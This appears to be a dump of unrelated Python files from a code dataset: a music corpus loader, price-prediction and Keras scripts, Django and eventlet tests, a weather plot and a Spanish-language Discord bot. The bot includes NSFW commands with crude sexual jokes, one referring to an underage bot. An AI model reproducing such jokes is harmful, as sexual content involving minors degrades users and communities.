annotations\n\nfrom glob import iglob\nimport random\nimport pickle\nimport music21 as mu\nfrom typing import Optional, Iterable, Tuple, Callable\n\nfrom .piece import Piece\nfrom .fmt import EventDataBuilder\nfrom .fmt.piece_data import PieceData\nfrom . import piece_filter\n\nclass AbstractCorpus(object):\n # Common code for save/loading of corpuses.\n def __init__(self):\n raise NotImplementedError\n\n def save(self, fname): \n with open(fname, 'wb+') as f:\n pickle.dump(self.__dict__,\n f,\n pickle.HIGHEST_PROTOCOL)\n\n def load(self, fname):\n with open(fname, 'rb') as f:\n self.__dict__ = pickle.load(f)\n\nclass Corpus(AbstractCorpus):\n '''\n A Corpus contains a collection of different mud.Piece objects.\n '''\n def __init__(\n self,\n patterns: Iterable[str] = [],\n filters: Iterable[Callable[[Piece], bool]] = [],\n from_file: Optional[str] = None,\n discard_rests: bool = False,\n max_len: Optional[int] = None,\n ignore_load_errors: bool = False,\n verbose: bool = False,\n transpose_to: Optional[str] = None):\n '''\n Load a corpus of pieces.\n \n Args:\n `patterns`: an iterable of globbable patterns (ie '*.musicxml'). Files which match the\n patterns will be loaded into the corpus. (Default: [])\n `filters`: an iterable of functions. Each function should take the form\n `f(mud.Piece) -> bool`. Only pieces which pass all filter functions will be kept.\n Useful filters are found in the `mud.piece_filter` module. (Default: [])\n `from_file`: This is a path to a pickled Corpus that will be loaded.\n If used, other information provided to load pieces will be *ignored*. (Optional)\n `discard_rests`: If True, the Rest notation events will be discarded in every piece.\n (Default: False)\n `max_len`: Stop loading when this many pieces have been successfully loaded. (Optional)\n `ignore_load_errors`: If True, ignore any load errors. Depending on the data being\n loaded, Music21 may not load pieces successfully, and this may be required.\n (Default: False)\n `verbose`: Show verbose output about the piece-loading process. (Default: False)\n `transpose_to`: If provided, transpose all pieces to this key. (Optional)\n\n Returns:\n A corpus containing the requested pieces.\n '''\n self._pieces = []\n self._num_rejected = 0\n\n if from_file is not None:\n if len(patterns) > 1:\n raise ValueError('Should not provide patterns if loading from file')\n self.load(from_file)\n else:\n def load(self_):\n for pattern in patterns:\n for fname in iglob(pattern):\n try:\n res, why = self_.load_piece(fname, filters, transpose_to)\n except (mu.exceptions21.StreamException,\n mu.musicxml.xmlToM21.MusicXMLImportException):\n if verbose: print(f' Failed to load file {fname}: ', end='')\n if ignore_load_errors:\n if verbose: print('continuing')\n continue\n if verbose: print('failing (use `ignore_load_errors=True` in corpus '\n 'to prevent)')\n raise\n if verbose:\n if res:\n print(f' loaded: {fname}')\n else:\n print(f' rejected: {fname}, {why}')\n if max_len is not None and self_.size() >= max_len:\n return\n load(self)\n \n if discard_rests:\n self.discard_rests()\n\n def size(self):\n ''' the size (number of pieces) in the Corpus '''\n return len(self._pieces)\n\n @property\n def pieces(self) -> Iterable[Piece]:\n ''' The contained list of pieces '''\n return self._pieces\n\n @property\n def num_rejected(self) -> int:\n ''' The number of pieces rejected when loading the corpus '''\n return self._num_rejected\n\n def passes_filters(\n self,\n piece: Piece,\n filters: Iterable[Callable[[Piece], bool]]) -> Tuple[bool, str]:\n '''\n Test whether a piece passes the required filter functions.\n\n Args:\n `piece`: the piece to test.\n `filters`: an iterable of lambda functions of the form `f(mud.Piece) -> bool`.\n \n Returns:\n A tuple `(passes, reason)`. `passes` is a boolean value indicating if the piece passed\n all the filters, and `reason` is a string which described why a piece did not pass if\n it failed.\n '''\n for f in filters:\n if not f(piece):\n self._num_rejected += 1\n return False, piece_filter.failure_reason(f)\n return True, \"Passes\"\n\n def load_piece(\n self,\n piece: str,\n filters: Iterable[Callable[[Piece], bool]] = [],\n transpose_to: Optional[bool] = None) -> Tuple[bool, str]:\n '''\n Load a single piece from a file into the Corpus if it passes the filters.\n Returns a tuple `(success, reason)`, where `reason` describes why a piece failed.\n '''\n p = Piece(piece, transpose_to)\n passes, reason = self.passes_filters(p, filters)\n if passes:\n p = self._pieces.append(p)\n return True, \"Success\"\n return False, reason\n\n def format_data(\n self,\n formatter: EventDataBuilder,\n slice_resolution: float,\n discard_rests: Optional[bool] = False) -> DataCorpus:\n '''\n Return a DataCorpus object containing the pieces in this Corpus formatted according to the\n given formatter object.\n '''\n return DataCorpus(self, formatter, slice_resolution, discard_rests)\n\n def filter(self, *filters: Callable[Piece, bool]):\n '''\n Filter out pieces that do not adhere to a set of filters. After calling, all pieces that\n do not pass the provided filter functions are removed from the corpus object.\n '''\n len_old = len(self._pieces)\n for f in filters:\n self._pieces = [p for p in self._pieces if f(p)]\n self._num_rejected += len_old - len(self._pieces)\n\n def discard_rests(self):\n '''\n Discard all rest events in all contained pieces.\n '''\n for piece in self._pieces:\n piece.discard_rests()\n\nclass DataCorpus(AbstractCorpus):\n '''\n A DataCorpus contains only \"\"data\"\" of a collection of pieces, intended for use as inputs and\n targets for a machine learning model. See the `mud.fmt.PieceData` class for more info.\n '''\n def __init__(\n self,\n corpus: Corpus,\n formatter: EventDataBuilder,\n slice_resolution: float,\n discard_rests: bool = False):\n self._data = [PieceData(p, formatter, slice_resolution, discard_rests)\n for p in corpus.pieces]\n\n def size(self) -> int:\n return len(self._data)\n\n @property\n def data(self) -> Iterable[PieceData]:\n return self._data\n\n def __iter__(self) -> Iterable[PieceData]:\n return self._data.__iter__()\n \n def __len__(self) -> int:\n return len(self._data)\n\n\n","sub_path":"mud/corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":8066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"346009025","text":"import pandas as pd\nimport datetime\nfrom concat_files import load_csv2df\n\n\ndef review(item):\n return pd.Series({\n 'Suma': item.sum(),\n 'p_value': item[item.notna()].size / item.size,\n 'missing': item[item.isna()].index.to_list()\n })\n\n\ndef cheapest(item):\n return item[item['Suma'] == item['Suma'].min()].iloc[-1]\n\ndef dia_to_ndia(dia):\n return (dia - datetime.datetime(1970, 1, 1)).days\n\ndef obtener_precio(producto, lugar, fecha_numero):\n # poner logica para leer el pickle file, largar el modelo, y correr la prediccion\n # escribir aqui la logica para entrenar y guardar en pickle.\n # arroz_pali.p\n import pickle\n from sklearn import linear_model\n import numpy as np\n nombre_archivo = f'{producto}_{lugar}.p'\n\n # Create linear regression object\n # load the model from disk\n modelo = pickle.load(open(nombre_archivo, 'rb'))\n vector_fechas = np.array([fecha_numero]).reshape(-1, 1)\n precio_predicho = modelo.predict(vector_fechas)\n return precio_predicho[0][0]\n\ndef rellenado(item):\n\n def otra_funcion(otro_elemento):\n lugar = otro_elemento.name[1]\n fecha = otro_elemento.name[0]\n producto = otro_elemento.index[0]\n\n # Predicción usando la fecha de hoy\n fecha_numero = dia_to_ndia(datetime.datetime.today())\n # producto, fecha, lugar -> fit \"predecir\" ----> numero (float)\n dato = obtener_precio(producto, lugar, fecha_numero)\n return pd.Series(dato)\n\n return item.to_frame().apply(otra_funcion, axis=1).iloc[:,0]\n\n\ndef best_price_by_list(data, lista):\n if data is None:\n print('No data available')\n return\n\n historico = (\n data.groupby(['Fecha', 'Lugar', 'Producto'])['Precio'].min()\n .unstack(level=0)\n .swaplevel()\n .sort_index()\n .sort_index(axis=1)\n )\n\n selection = (\n historico.iloc[:, [-1]]\n .unstack()\n .loc[lista]\n )\n\n def entrenar_modelo(producto, lugar, vector_fechas, vector_precios):\n import pickle\n from sklearn import linear_model\n\n # escribir aqui la logica para entrenar y guardar en pickle.\n # arroz_pali.p\n nombre_archivo = f'{producto}_{lugar}.p'\n vector_fechas = vector_fechas.reshape(-1, 1)\n vector_precios = vector_precios.reshape(-1, 1)\n\n # Create linear regression object\n modelo = linear_model.LinearRegression()\n modelo.fit(vector_fechas, vector_precios)\n\n # save the model to disk\n pickle.dump(modelo, open(nombre_archivo, 'wb'))\n\n def entrenar(item):\n mi_serie_limpia = item.dropna()\n mi_serie_limpia.index = pd.to_datetime(mi_serie_limpia.index)\n mi_serie_limpia.index = mi_serie_limpia.reset_index().iloc[:, 0].apply(dia_to_ndia)\n producto, lugar = mi_serie_limpia.name\n entrenar_modelo(producto, lugar, mi_serie_limpia.index.values, mi_serie_limpia.values)\n\n # Habilitar para generar modelos entrenados y guardarlos como pickles files\n #historico.apply(entrenar, axis=1)\n\n # Método a aplicar el rellenado mediante regression lineal\n selection = selection.apply(rellenado , axis=1)\n\n # quitar un nivel. quitar el nivel de las fechas\n selection = selection.droplevel(level=0, axis=1)\n\n res = (\n selection.apply(review, axis=0)\n .T.reset_index()\n .groupby(['p_value']).apply(cheapest)\n )\n return res[res['p_value'] == 1]\n\nif __name__ == '__main__':\n data = load_csv2df()\n product_list = ['arroz', 'frijoles']\n print(product_list)\n print(best_price_by_list(data=data, lista=product_list))\n\n print('-'* 100)\n product_list = ['pan', 'queso', 'tomate']\n print(product_list)\n print(best_price_by_list(data=data, lista=product_list))\n\n print('-' * 100)\n product_list = [ 'queso', 'tomate']\n print(product_list)\n print(best_price_by_list(data=data, lista=product_list))\n\n print('-' * 100)\n product_list = [ 'cereal', 'jugo']\n print(product_list)\n print(best_price_by_list(data=data, lista=product_list))","sub_path":"best_price.py","file_name":"best_price.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"538983163","text":"from rest_framework.test import APITestCase, APIClient, APIRequestFactory\nfrom rest_framework.views import status\nfrom .models import Contractor\nfrom .models import User\nfrom .models import Project\nfrom .models import ContractorProject\nfrom .serializers import ContractorSerializer\nfrom .serializers import ProjectSerializer\n\nclass BaseTest(APITestCase):\n client = APIClient()\n\nclass UserSeesTheirProjectsTest(BaseTest):\n\n def test_getting_all_of_a_users_projects(self):\n\n user_1 = User(\n full_name='Princess',\n email='another_castle@mail.com',\n phone_number='1234566',\n zip='12345'\n )\n user_1.save()\n\n user_2 = User(\n full_name='Bowser',\n email='my_castle@mail.com',\n phone_number='2234566',\n zip='22345'\n )\n user_2.save()\n\n project_1 = Project(\n user=user_1,\n title='project_numero_uno',\n description='this is the first project',\n category='plumbing',\n user_before_picture='picture.png'\n )\n project_1.save()\n\n project_2 = Project(\n user=user_1,\n title='project_numero_dos',\n description='this is the second project',\n category='plumbing',\n user_before_picture='picture.png'\n )\n project_2.save()\n\n project_3 = Project(\n user=user_2,\n title='project_numero_tres',\n description='this is the third project',\n category='plumbing',\n user_before_picture='picture.png'\n )\n project_3.save()\n\n contractor_1 = Contractor(\n name='Mario',\n email='mario@mail.com',\n phone_number='111111111',\n zip='80124',\n category='plumbing',\n logo='logo.jpg',\n example_project_1='picture.png',\n example_project_2='picture.png'\n )\n contractor_1.save()\n\n contractor_2 = Contractor(\n name='Luigi',\n email='Luigi@mail.com',\n phone_number='222222222',\n zip='80224',\n category='plumbing',\n logo='logo.jpg',\n example_project_1='picture.png',\n example_project_2='picture.png'\n )\n contractor_2.save()\n\n contractor_project_1 = ContractorProject(\n project=project_2,\n contractor=contractor_1,\n contractor_choice=0,\n user_choice=True,\n completed=False,\n seen=False,\n contractor_before_picture='picture.png',\n user_rating=5,\n contractor_rating=5\n )\n contractor_project_1.save()\n\n contractor_project_2 = ContractorProject(\n project=project_2,\n contractor=contractor_2,\n contractor_choice=2,\n user_choice=True,\n completed=False,\n seen=False,\n contractor_before_picture='picture.png',\n user_rating=5,\n contractor_rating=5\n )\n contractor_project_2.save()\n\n response = self.client.get(f'/api/v1/users/{user_1.id}/projects', format='json')\n\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.data), 2)\n self.assertEqual(response.data[0]['id'], project_2.id)\n self.assertEqual(response.data[0]['title'], project_2.title)\n self.assertEqual(response.data[0]['description'], project_2.description)\n self.assertEqual(response.data[0]['category'], project_2.category)\n self.assertEqual(response.data[0]['user_before_picture'], project_2.user_before_picture)\n self.assertEqual(response.data[0]['user_after_picture'], project_2.user_after_picture)\n self.assertEqual(response.data[0]['contractors'][0], {\n 'contractor_id': contractor_2.id,\n 'picture_1': contractor_2.example_project_1,\n 'picture_2': contractor_2.example_project_2,\n 'user_choice': True\n })\n","sub_path":"fix_up/tests_user_sees_their_projects.py","file_name":"tests_user_sees_their_projects.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"341366588","text":"import discord\r\nfrom discord.ext import commands\r\nfrom asyncio import *\r\nimport asyncio\r\nfrom aiohttp import *\r\nimport aiohttp\r\nfrom discord.ext.commands import Bot\r\nfrom discord.utils import find\r\nimport requests\r\nimport os\r\nimport rule34\r\nimport random\r\nimport urllib.request,unicodedata\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.request import urlopen\r\nfrom random import shuffle\r\nfrom googletrans import Translator\r\nimport youtube_dl\r\nimport pycparser\r\nimport json\r\n\r\ndef search_youtube(tag):\r\n textToSearch = tag\r\n query = urllib.request.quote(textToSearch)\r\n url = \"https://www.youtube.com/results?search_query=\" + query\r\n response = urlopen(url)\r\n html = response.read()\r\n soup = BeautifulSoup(html, \"html.parser\")\r\n for vid in soup.findAll(\"a\", attrs={'class':'yt-uix-tile-link'}):\r\n jiji = vid[\"href\"].startswith(\"/watch?v=\")\r\n if not jiji == False:\r\n return 'https://www.youtube.com' + vid[\"href\"]\r\n\r\ntranslator = Translator()\r\nbot = commands.Bot(command_prefix='.+')\r\nloop = asyncio.get_event_loop()\r\nautor = 316736672324911106\r\nspecter = 336215189558919168\r\n\r\nyoutube_dl.utils.bug_reports_message = lambda: ''\r\n\r\nytdl_format_options = {\r\n 'format': 'bestaudio/best',\r\n 'outtmpl': '%(extractor)s-%(id)s-%(title)s.%(ext)s',\r\n 'restrictfilenames': True,\r\n 'noplaylist': True,\r\n 'nocheckcertificate': True,\r\n 'ignoreerrors': False,\r\n 'logtostderr': False,\r\n 'quiet': True,\r\n 'no_warnings': True,\r\n 'default_search': 'auto',\r\n 'source_address': '0.0.0.0' # bind to ipv4 since ipv6 addresses cause issues sometimes\r\n}\r\n\r\nffmpeg = {\r\n 'options': '-vn'\r\n}\r\n\r\nytdl = youtube_dl.YoutubeDL(ytdl_format_options)\r\n\r\nclass YTDLSource(discord.PCMVolumeTransformer):\r\n def __init__(self, source, *, data, volume=0.5):\r\n super().__init__(source, volume)\r\n\r\n self.data = data\r\n\r\n self.title = data.get('title')\r\n self.url = data.get('url')\r\n\r\n @classmethod\r\n async def from_url(cls, url, *, loop=None, stream=False):\r\n loop = loop or asyncio.get_event_loop()\r\n data = await loop.run_in_executor(None, lambda: ytdl.extract_info(url, download=not stream))\r\n\r\n if 'entries' in data:\r\n # take first item from a playlist\r\n data = data['entries'][0]\r\n\r\n filename = data['url'] if stream else ytdl.prepare_filename(data)\r\n return cls(discord.FFmpegPCMAudio(filename, **ffmpeg), data=data)\r\n\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print('Logged in as')\r\n print(bot.user.name)\r\n print(bot.user.id)\r\n print('------')\r\n activity = discord.Game(name=\".+help para ayuda\")\r\n await bot.change_presence(status=discord.Status.idle, activity=activity)\r\n\r\n@bot.event\r\nasync def on_guild_join(guild):\r\n general = find(lambda x: x.name == 'general', guild.text_channels)\r\n if general and general.permissions_for(guild.me).send_messages:\r\n await general.send(\"Hello wa.\")\r\n\r\n@bot.event\r\nasync def on_member_join(member):\r\n await member.send(\"WAlcome.\")\r\n\r\n\r\n@bot.command()\r\nasync def estado(ctx, *args):\r\n mesg = \" \".join(args)\r\n if ctx.author.id == autor:\r\n activity = discord.Game(name=mesg)\r\n await bot.change_presence(status=discord.Status.idle, activity=activity)\r\n else:\r\n await ctx.send(\"No tienes suficientes permisos, {0.author.mention}, sólo el autor del bot puede hacerlo.\".format(ctx))\r\n\r\n@bot.command()\r\nasync def join(ctx, channel: discord.VoiceChannel):\r\n \"\"\"\"Joins a voice channel\"\"\"\r\n\r\n if ctx.voice_client is not None:\r\n return await ctx.voice_client.move_to()\r\n\r\n await channel.connect()\r\n\r\n@bot.command()\r\nasync def yt(ctx, url):\r\n \"\"\"Plays from a url (almost anything youtube_dl supports)\"\"\"\r\n\r\n async with ctx.typing():\r\n player = await YTDLSource.from_url(url, loop=bot.loop)\r\n ctx.voice_client.play(player, after=lambda e: print('Player error: %s' % e) if e else None)\r\n\r\n await ctx.send('Now playing: {}'.format(player.title))\r\n\r\n@bot.command()\r\nasync def s_yt(ctx, *args):\r\n mesg = \" \".join(args)\r\n search = search_youtube(mesg)\r\n if search == \"Error, el vídeo tiene anuncios.\":\r\n await ctx.send(\"Error, el vídeo tiene anuncios, imposible reproducir, inténtelo de nuevo con '.+yt ', lo siento. :c\")\r\n else:\r\n async with ctx.typing():\r\n player = await YTDLSource.from_url(search, loop=bot.loop)\r\n ctx.voice_client.play(player, after=lambda e: print('Player error: %s' % e) if e else None)\r\n\r\n await ctx.send('Now playing: {}'.format(player.title))\r\n\r\n@bot.command()\r\nasync def volume(ctx, volume: int):\r\n \"\"\"Changes the player's volume\"\"\"\r\n\r\n if ctx.voice_client is None:\r\n return await ctx.send(\"Not connected to a voice channel.\")\r\n\r\n ctx.voice_client.source.volume = volume\r\n await ctx.send(\"Changed volume to {}%\".format(volume))\r\n\r\n@bot.command()\r\nasync def stop(ctx, channel: discord.VoiceChannel):\r\n \"\"\"Stops and disconnects the bot from voice\"\"\"\r\n\r\n await ctx.voice_client.disconnect()\r\n await channel.connect()\r\n\r\n@bot.command()\r\nasync def s_videos_yt(ctx, *args):\r\n mesg = \" \".join(args)\r\n search = search_youtube(mesg)\r\n await ctx.send(f\"Vídeo más coincidente: {search}\")\r\n\r\n@bot.command()\r\nasync def follar(ctx, member):\r\n if ctx.channel.is_nsfw():\r\n if ctx.author.id == autor and member == f\"<@{bot.user.id}>\":\r\n await ctx.send(\"Ah~~ sí, violame, mi ama. Miau.\")\r\n else:\r\n if member == f\"<@{bot.user.id}>\":\r\n await ctx.send(\"¿Perdona? Estás violando a un bot menor de edad, he mandado a la FBI a buscarte.\")\r\n else:\r\n if ctx.author.id == autor and member == \"<@336215189558919168>\":\r\n await ctx.send(\"{0.author.mention} se foia a \".format(ctx) + member + os.linesep + \"lo goza y es oficialmente parte del harem de Lolire.\")\r\n else:\r\n await ctx.send(\"{0.author.mention} se foia a \".format(ctx) + member)\r\n else:\r\n await ctx.send(\"No puedes utilizar este comando en canales no nsfw. :)\")\r\n\r\n@bot.command()\r\nasync def abrazar(ctx, member):\r\n choice = random.choice([\"https://media.giphy.com/media/3M4NpbLCTxBqU/giphy.gif\", \"https://media.giphy.com/media/l4FGpP4lxGGgK5CBW/giphy.gif\", \"https://media.giphy.com/media/Y6uhhPPB5DYT6/giphy.gif\", \"https://media.giphy.com/media/Bj9k1U69GZ8Iw/giphy.gif\", \"https://media.giphy.com/media/EvYHHSntaIl5m/giphy.gif\", \"https://media.giphy.com/media/xT0Gqne4C3IxaBcOdy/giphy.gif\"])\r\n if choice == \"https://media.giphy.com/media/Y6uhhPPB5DYT6/giphy.gif\":\r\n await ctx.send(\"{0.author.mention} ha abrazado a \".format(ctx) + member + os.linesep + choice + os.linesep + \"Me recuerda a detroit become human, ¿Sabes?, el gif digo.\")\r\n else:\r\n await ctx.send(\"{0.author.mention} ha abrazado a \".format(ctx) + member + os.linesep + choice)\r\n\r\n@bot.command()\r\nasync def besar(ctx, member):\r\n choice = random.choice([\"https://media.giphy.com/media/BUEUprrn4b5zG/giphy.gif\", \"https://media.giphy.com/media/l0HlPkb1ktE2PZFbG/giphy.gif\", \"https://media.giphy.com/media/3XV3AvAo3jiQ8/giphy.gif\"])\r\n await ctx.send(\"{0.author.mention} ha besado a \".format(ctx) + member + os.linesep + choice)\r\n\r\n@bot.command()\r\nasync def say(ctx, *args):\r\n mesg = \" \".join(args)\r\n await ctx.send(mesg)\r\n\r\n@bot.command()\r\nasync def traducir(ctx, dezt, *args):\r\n mesg = \" \".join(args)\r\n idiomaoriginal = translator.detect(mesg)\r\n traducido = translator.translate(mesg, dest=dezt)\r\n await ctx.send(\"El texto traducido es \" + \"**\"+traducido.text+\"**\" + os.linesep + \"El idioma de origen era \" + \"**\"+idiomaoriginal.lang+\"**\")\r\n\r\n@bot.command()\r\nasync def wa(ctx):\r\n await ctx.send(\"Wa\")\r\n\r\n@bot.command()\r\nasync def tts(ctx, *args):\r\n mesg = \" \".join(args)\r\n await ctx.send(mesg, tts=True)\r\n\r\n@bot.command()\r\nasync def purr(ctx):\r\n await ctx.send(\"Miau\")\r\n\r\n@bot.command()\r\nasync def r34(ctx, tag):\r\n if ctx.channel.is_nsfw():\r\n loop = asyncio.get_event_loop()\r\n async with aiohttp.ClientSession() as session:\r\n r34 = rule34.Rule34(loop)\r\n URL = await r34.getImageURLS(tags=tag, randomPID=True, singlePage=True)\r\n if URL == None:\r\n choice = random.choice([\"O NOOOOO, 0 RESULTADOS, TE QUEDASTE SIN TU PORNO. :c\", \"No hay resultados, pajero. :c\", \"Lo siento, sin resultados. :c\"])\r\n await ctx.send(choice)\r\n else:\r\n shuffle(URL)\r\n for links in URL:\r\n await ctx.send(str(links) + \" {0.author.mention}\".format(ctx))\r\n await aiohttp.ClientSession.close()\r\n else:\r\n await ctx.send(\"No puedes utilizar este comando en canales no nsfw. :thinking:\")\r\n\r\n\r\nbot.run(os.getenv(\"TOKEN\"))","sub_path":"LoliBot.py","file_name":"LoliBot.py","file_ext":"py","file_size_in_byte":8888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"354020018","text":"import sys\nfrom collections import Counter\n\ndef Least_Common(lst):\n data = Counter(lst)\n return data.most_common(26)[25][0]\n\ndef main(): \n \n with open(sys.argv[1], 'r') as myfile:\n data=myfile.readlines()\n value = [[0 for x in range(0, 598)] for y in range(0, 8)] \n \n for k in range(0, 598): \n for j in range(0, 8):\n value[j][k] = str(data[k][j])\n \n errorCorrected = \"\"\n \n for m in range(0, 8):\n errorCorrected = errorCorrected + Least_Common(value[m])\n \n print(errorCorrected)\n \n \nif __name__ == '__main__':\n main()\n","sub_path":"Day6/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"249172732","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 21 23:38:44 2018\n\n@author: MSG\n\"\"\"\nimport pygal\nimport csv\nfrom datetime import datetime\n#filename = 'sitka_weather_07-2014.csv'\nfilename = 'death_valley_2014.csv'\nwith open(filename) as f:\n #create a reader object\n reader = csv.reader(f)\n #get next line in the file \n #gets the first line of the file, which contains the file headers\n header_row = next(reader)\n #print(header_row)\n \n #We use enumerate() on the list to get the index of each item, as well\n #as the value.\n for index, column_header in enumerate(header_row):\n print(index, column_header)\n \n #Extracting and Reading Data\n \n # Get dates ,low and high temperatures from file.\n dates, high_temps, low_temps = [], [], []\n for row in reader:\n #Because we’ve already read the header row, the loop will begin\n #at the second line where the actual data begins\n try:\n #convert the strings to integers(to allow visualisation)\n current_date = datetime.strptime(row[0], \"%Y-%m-%d\")\n high = int(row[1]) \n low = int(row[2]) \n \n except ValueError:\n #pass\n print(current_date, 'missing data')\n else:\n dates.append(current_date)\n high_temps.append(high)\n low_temps.append(low)\n \n print('high_temps')\n print(high_temps)\n print(' ')\n print('low_temps')\n print(low_temps)\n\n#visualize results\nimport matplotlib.pyplot as plt\n\nfig = plt.figure(dpi=80, figsize=(10, 6))\n#shade areas in the plot\n#use the fill_between() method, which takes a series of x-values and two\n#series of y-values, and fills the space between the two y-value series\n#alpha controls the color's transparency \nplt.plot(dates, high_temps, c='red', alpha=0.6)\nplt.plot(dates, low_temps, c='blue', alpha=0.5)\nplt.fill_between(dates, high_temps, low_temps, facecolor='blue', alpha=0.1)\nfig.autofmt_xdate()\n\n\n# Format plot.\nplt.title('Monthly high,and low temperatures, \\n Death_valley 2014', fontsize=24)\nplt.xlabel(' ')\nplt.ylabel('Temperature (F)', fontsize=12)\nplt.tick_params(axis='both', which='major', labelsize=12)\n#plt.savefig('weather_temp.svg')\nplt.savefig('weather_temp.png')\nplt.show()","sub_path":"using pygal/highs_lows.py","file_name":"highs_lows.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"182209153","text":"from mock import Mock\nfrom test_protocol import create_pipes\nfrom .dispatcher import Dispatcher\nfrom .configuration import ConfigurationLibrary\nimport eventlet\nfrom .handshake import ConnectionHandler, client_handshake, WebServer, client_web_connect\nfrom nose.tools import assert_raises, assert_equals\nfrom .protocol import ConnectionLost\nfrom eventlet.green import urllib2\n\n\n\ndef test_server_handshake():\n server, client = create_pipes()\n dispatcher = Mock(Dispatcher)\n library = Mock(ConfigurationLibrary)\n handler = ConnectionHandler(dispatcher, library, 'secret')\n\n thread = eventlet.spawn( handler.new_connection, server )\n\n client_dispatcher, client_library = client_handshake(client, 'secret')\n client_dispatcher.add_worker(None, 7)\n client_library.add('Yellow')\n eventlet.sleep()\n\n\n assert dispatcher.add_worker.called\n library.add.assert_called_with('Yellow')\n\ndef test_server_handshake_unauthorized():\n server, client = create_pipes()\n dispatcher = Mock(Dispatcher)\n library = Mock(ConfigurationLibrary)\n handler = ConnectionHandler(dispatcher, library, 'secret')\n\n thread = eventlet.spawn( handler.new_connection, server )\n\n assert_raises(ConnectionLost, client_handshake, client, 'seret')\n\n\n\n\ndef basic_web_handler(env, start_response):\n start_response('200 OK', [('Content-Type', 'text/plain')])\n return [\"Hello World\"]\n\nclass FakeConnectionHandler(object):\n def __init__(self):\n self.incoming = None\n\n def new_connection(self, connection):\n connection.write('HELLO')\n connection.flush()\n connection.close()\n\ndef test_web():\n webserver = WebServer(basic_web_handler, None)\n eventlet.spawn( webserver.listen, ('', 1996) )\n eventlet.sleep()\n\n data = urllib2.urlopen('http://localhost:1996').read()\n assert_equals(data, 'Hello World')\n\ndef test_not_web():\n webserver = WebServer(None, FakeConnectionHandler())\n eventlet.spawn( webserver.listen, ('', 1997) )\n eventlet.sleep()\n\n client = client_web_connect( ('', 1997) )\n data = client.read(5)\n assert_equals(data, 'HELLO')\n\n","sub_path":"pymultinode/test_handshake.py","file_name":"test_handshake.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"654110548","text":"import numpy as np\nimport pandas as pd\nimport sys\nfrom sklearn import preprocessing\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.models import load_model\n\n\n\ndef PreprocessTestData(raw_df):\n df = raw_df.drop(['Test_ID'], axis = 1)\n\n # df = df.drop(['SEX'], axis = 1)\n\n # df['EDUCATION'] = df['EDUCATION'].map({0:0, 1:1, 2:2, 3:3, 4:0, 5:0, 6:0})\n\n df['PAY_1'] = df['PAY_1'].map({-2:-2, -1:-1, 0:0, 1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:6, 8:6, 9:6})\n\n # x_OneHot_df = pd.get_dummies(data = df, columns = ['MARRIAGE'])\n\n # x_OneHot_df = x_OneHot_df.drop(['MARRIAGE_0'], axis = 1)\n\n # x_OneHot_df = pd.get_dummies(data = df, columns = ['EDUCATION'])\n # x_OneHot_df = x_OneHot_df.drop(['EDUCATION_0'], axis = 1)\n\n x_OneHot_df = pd.get_dummies(data = df, columns = ['PAY_1'])\n\n x_OneHot_df = x_OneHot_df.drop(['PAY_1_6'], axis = 1)\n\n\n ndarray = x_OneHot_df.values\n\n\n # print ndarray[:2]\n\n Features = ndarray\n\n minmax_scale = preprocessing.MinMaxScaler(feature_range=(0, 1))\n\n scaledFeatures = minmax_scale.fit_transform(Features)\n\n return scaledFeatures\n\n\n\nif __name__ == '__main__':\n model = load_model('model.h5')\n\n test_public_df = pd.read_csv(sys.argv[1])\n test_private_df = pd.read_csv(sys.argv[2])\n\n\n test_Features = PreprocessTestData(test_public_df)\n test_probability = model.predict(test_Features)\n\n p = test_public_df\n p.insert(len(test_public_df.columns), 'probability', test_probability)\n\n lc = pd.DataFrame(data = p)\n\n lc = lc.rename(columns = {'Test_ID': 'Rank_ID'})\n\n\n d = lc.sort_values(by = ['probability'], ascending = False)\n\n Rank = d.iloc[:, 0]\n\n Rank.to_csv('public.csv', index = None, header = 'Rank_ID')\n\n\n\n test_Features = PreprocessTestData(test_private_df)\n test_probability = model.predict(test_Features)\n\n p = test_private_df\n p.insert(len(test_private_df.columns), 'probability', test_probability)\n\n lc = pd.DataFrame(data = p)\n\n lc = lc.rename(columns = {'Test_ID': 'Rank_ID'})\n\n\n d = lc.sort_values(by = ['probability'], ascending = False)\n\n Rank = d.iloc[:, 0]\n\n Rank.to_csv('private.csv', index = None, header = 'Rank_ID')\n\n\n","sub_path":"kaggle/te1.py","file_name":"te1.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"149941216","text":"from time import sleep\n\nprint('* '*26)\nprint('{:^50}'.format('CAIXA ELETRÔNICO'))\nprint('* '*26)\n\nvalor = int(input('\\nQual valor deseja sacar? R$ '))\n\ntotal = valor\nced = 50\ntotced = 0\n\nprint('\\nCalculando', end='')\nsleep(0.5)\nprint('.', end='')\nsleep(0.5)\nprint('.', end='')\nsleep(0.5)\nprint('.')\n\nwhile True:\n if total >= ced:\n total -= ced\n totced += 1\n else:\n if totced > 0:\n print(f'\\nTotal de {totced} cédulas de R$ {ced:.2f}')\n if ced == 50:\n ced = 20\n elif ced == 20:\n ced = 10\n elif ced == 10:\n ced = 1\n totced = 0\n if total == 0:\n break\n\nprint('\\n')\nprint('* '*26)\nprint('{:^50}'.format('FIM DO PROGRAMA'))\nprint('* 